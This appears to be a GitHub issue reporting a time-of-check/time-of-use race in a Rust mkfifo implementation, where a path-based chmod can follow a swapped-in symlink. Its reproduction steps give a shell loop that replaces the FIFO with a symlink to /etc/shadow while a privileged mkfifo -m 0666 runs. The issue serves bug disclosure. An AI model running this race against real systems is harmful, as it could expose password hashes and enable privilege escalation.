mkfifo TOCTOU race via path-based chmod

## Component
`mkfifo`

## Description
mkfifo creates a FIFO and then unconditionally performs a path-based `chmod` via `std::fs::set_permissions`. 

Between these operations, an attacker with write access to the containing directory can replace the FIFO with a symlink.

Additionally, for the default case (no `-m` flag), the chmod is redundant as the kernel already applies umask during creation.

## Test / Reproduction Steps
```bash
# Terminal 1 (attacker, racing the chmod):
while true; do
  rm -f /tmp/fifo; ln -s /etc/shadow /tmp/fifo
done

# Terminal 2 (victim with privileges):
while true; do
  rm -f /tmp/fifo; mkfifo -m 0666 /tmp/fifo
done

# Check if /etc/shadow permissions changed
```


Provide feedback

Saved searches

Use saved searches to filter your results more quickly

Uh oh!

Uh oh!

mkfifo TOCTOU race via path-based chmod #10020

Component

Description

Test / Reproduction Steps

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Uh oh!

mkfifo TOCTOU race via path-based chmod #10020

Description

Component

Description

Test / Reproduction Steps

Metadata

Metadata

Assignees

Labels

Type

Projects

Milestone

Relationships

Development

Issue actions